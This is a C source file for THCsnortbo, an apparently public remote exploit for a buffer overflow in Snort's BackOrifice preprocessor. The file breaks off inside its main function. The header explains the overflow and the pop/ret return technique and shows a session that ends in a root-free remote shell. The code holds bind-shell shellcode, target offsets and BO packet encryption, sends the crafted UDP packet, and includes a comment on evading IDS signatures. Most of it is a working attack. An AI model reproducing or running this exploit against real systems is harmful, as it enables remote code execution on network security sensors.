/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by rd@thc.org
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/

/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i < len ) {
* plaintext = (char) (*pkt_data ^ (BoRand()%256));
* *buf_ptr = plaintext;
* i++;
* pkt_data++;
* buf_ptr++;
*
* len is taken from the BO packet header, so its a buffer
* overflow when len > buf1 size.
*
* The exchange of data between the BO client and server is
* done using encrypted UDP packets
*
* BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html)
* Mnemonic Size in bytes
* MAGIC 8
* LEN 4
* ID 4
* T 1
* DATA variable
* CRC 1
*
* On x86, because of the stack layout, we end up overwriting
* the loop counter (i and len). To solve this problem, we
* can set back the approriate value for i and len. We can
* also able to set a NULL byte to stop the loop.
*
* There is no chance for bruteforce, snort will die after the
* first bad try. On Linux system with kernel 2.6 with VA
* randomized, it would be much harder for a reliable exploit.
*
*
* In case of _non-optimized_ compiled snort binary, the stack
* would looks like this:
*
* [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data]
*
* The exploit could be reliable in this case, by using a
* pop/ret return addess. Lets send to snort a UDP packet
* as the following:
*
* [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ]
* [ Encrypted ][ Non Encrypted ]
*
* When the overwriting loop stop, pkt_data will point to
* the memory after return address (NOP part) in raw packet
* data. So, using a return address that points to POP/RET
* instructions would be enough for a reliable exploit.
* (objdump -d binary|grep -B1 ret|grep -A1 pop to find one)
*
* This method will work well under linux kernel 2.6 with VA
* randomized also.
*
* In case of optimized binary, it would be harder since
* the counter i, len and buffer pointers could/possibly be
* registered variables. And the register points to buffer
* get poped from stack when the funtion return. In this case,
* the return address should be hard-coded but it would be
* unreliable (especially on linux kernel 2.6 with VA
* randomization patch).
*
* This exploit would generally work. Providing that you know
* how to find and use correct offsets and return address :>
*
*
* Example:
*
* $ ./THCsnortbo
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Usage: ./THCsnortbo host target
*
* Available Targets:
* 1 | manual testing gcc with -O0
* 2 | manual testing gcc with -O2
*
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
*
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_TIME_H
#include <sys/time.h>
#endif
#ifdef HAVE_SYS_SELECT_H
#include<sys/select.h>
#endif
#ifdef HAVE_STRINGS_H
#include<strings.h>
#endif
#ifdef HAVE_MALLOC_H
#include <malloc.h>
#endif
#include <netdb.h>
#include <string.h>
#include <ctype.h>

#define VERSION "0.3"

/* shellcodes */

/* a quick test bind shellcode on port 31337 from metasploit
*
* Connect back shellcode for snort exploit should be better, do
* it by yourself. im lazy :>
*/
unsigned char x86_lnx_bind[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

typedef struct {
char *desc; // description
unsigned char *scode; // shellcode
unsigned int scode_len;
unsigned long retaddr; // return address
unsigned int i_var_off; // offset from buf1 to variable 'i'
unsigned int len_var_off; // offset from buf1 to variable 'len'
unsigned int ret_off; // offset from buf1 to saved eip
unsigned int datasize; // value of size field in BO ping packet
} t_target;

t_target targets[] = {
{
"manual testing gcc with -O0",
x86_lnx_bind, sizeof(x86_lnx_bind),
//0x0804aa07,
0x4008f000+0x16143, // pop/ret in libc
1024+1+32, 1024+1+44, 1024+1+60,
0xFFFFFFFF
},
{
"manual testing gcc with -O2",
x86_lnx_bind, sizeof(x86_lnx_bind),
0x0804aa07, //0xbfffe9e0
1024+1+8, 1024+1+20, 1024+1+44,
1048+4+24
},
{ NULL, NULL, 0, 0, 0, 0, 0, 0 }
};

#define PACKETSIZE 1400
#define OVERFLOW_BUFFSZ 1024
#define IVAL 0x11223344;
#define LVAL 0x11223354+16;

#define ARGSIZE 256
#define PORT 53
#define MAGICSTRING "*!*QWTY?"
#define MAGICSTRINGLEN 8
#define TYPE_PING 0x01

static long holdrand = 1L;
char g_password[ARGSIZE];
int port = PORT;

/*
* borrowed some code from BO client
*/
void msrand (unsigned int seed )
{
holdrand = (long)seed;
}

int mrand ( void)
{
return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}

unsigned int getkey()
{
int x, y;
unsigned int z;

y = strlen(g_password);
if (!y)
return 31337;
else {
z = 0;
for (x = 0; x < y; x++)
z+= g_password[x];

for (x = 0; x < y; x++) {
if (x%2)
z-= g_password[x] * (y-x+1);
else
z+= g_password[x] * (y-x+1);
z = z%RAND_MAX;
}

z = (z * y)%RAND_MAX;
return z;
}
}

void BOcrypt(unsigned char *buff, int len)
{
int y;

if (!len)
return;

msrand(getkey());
for (y = 0; y < len; y++)
buff[y] = buff[y] ^ (mrand()%256);
}

void explbuild(unsigned char *buff, t_target *t)
{
unsigned char *ptr;
unsigned long *pdw;
unsigned long size;
unsigned char *scode;
unsigned int scode_len;
unsigned long retaddr;
unsigned int i_var_off;
unsigned int len_var_off;
unsigned int ret_off;
unsigned int datasize;

scode = t->scode;
scode_len = t->scode_len;
retaddr = t->retaddr;
i_var_off = t->i_var_off;
len_var_off = t->len_var_off;
ret_off = t->ret_off;
datasize = t->datasize;

memset(buff, 0x90, PACKETSIZE);
buff[PACKETSIZE - 1] = 0;

strcpy(buff, MAGICSTRING);

pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
*pdw++ = datasize;
*pdw++ = (unsigned long)-1;
ptr = (unsigned char *)pdw;
*ptr++ = TYPE_PING;

size = IVAL;
memcpy(buff + i_var_off, &size, 4);
size = LVAL;
memcpy(buff + len_var_off, &size, 4);

memcpy(buff + ret_off, &retaddr, 4);

/* you may want to place shellcode on encrypted part and will
* be decrypted into buf1 by BoGetDirection
*/
// memcpy(buff + OVERFLOW_BUFFSZ - scode_len - 128,
// (char *) scode, scode_len);

memcpy(buff + PACKETSIZE - scode_len - 1, (char *)scode, scode_len);

/* you may want to set NULL byte to stop the loop here, but it
* won't work with pop/ret method
*/
// buff[ret_off + 4] = 0;

size = ret_off + 4;
BOcrypt(buff, (int)size);
}

int sendping(unsigned long dest, int port, int sock, unsigned char *buff)
{
struct sockaddr_in host;
int i, size;
fd_set fdset;
struct timeval tv;

size=PACKETSIZE;
host.sin_family = AF_INET;
host.sin_port = htons((u_short)port);
host.sin_addr.s_addr = dest;

FD_ZERO(&fdset);
FD_SET(sock, &fdset);
tv.tv_sec = 10;
tv.tv_usec = 0;

i = select(sock+1, NULL, &fdset, NULL, &tv);
if (i == 0) {
printf("Timeout\n");
return(1);
} else if (i < 0) {
perror("select: ");
return(1);
}

if ( (sendto(sock, buff, size, 0,
(struct sockaddr *)&host, sizeof(host))) != size ) {
perror("sendto: ");
return(1);
}

return 0;
}

void usage(char *prog)
{
int n;

printf("Usage: %s host target\n\nAvailable Targets:\n", prog);

for (n = 0 ; targets[n].desc != NULL ; n++)
printf ("%3d | %s\n", n + 1, targets[n].desc);
printf (" \n");
}

int main(int argc, char **argv)
{
struct in_addr hostin;
unsigned long dest;
char buff[PACKETSIZE];
int ntarget;

printf("Snort BackOrifice PING exploit (version "VERSION")\n"
"by rd@thc.org\n\n");

if (argc < 3 || ((ntarget = atoi(argv[2])) <= 0) ) {
usage(argv[0]);
return 0;
}

if (ntarget >= (sizeof(targets) / sizeof(t_target))) {
printf ("WARNING: target out of list. list:\n\n");
usage(argv[0]);
return 0;
}

ntarget = ntarget - 1;

// change the key here to avoid the detection of a simple
// packet matching IDS signature.
g_password[0] = 0;

if ( (dest = inet_addr(argv[1])) == (unsigned long)-1)
printf("Bad IP: '%s'\n", argv[1]);
else {
int s;
hostin.s_addr = dest;
s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);

printf("Selected target:\n%3d | %s\n", ntarget+1,
targets[ntarget].desc);
explbuild(buff, &targets[ntarget]);

printf("\nSending exploit to %s\n", inet_ntoa(hostin));
if (sendping(dest, port, s, buff))
printf("Sending exploit failed for dest %s\n",
inet_ntoa(hostin));
printf("Done.\n");
}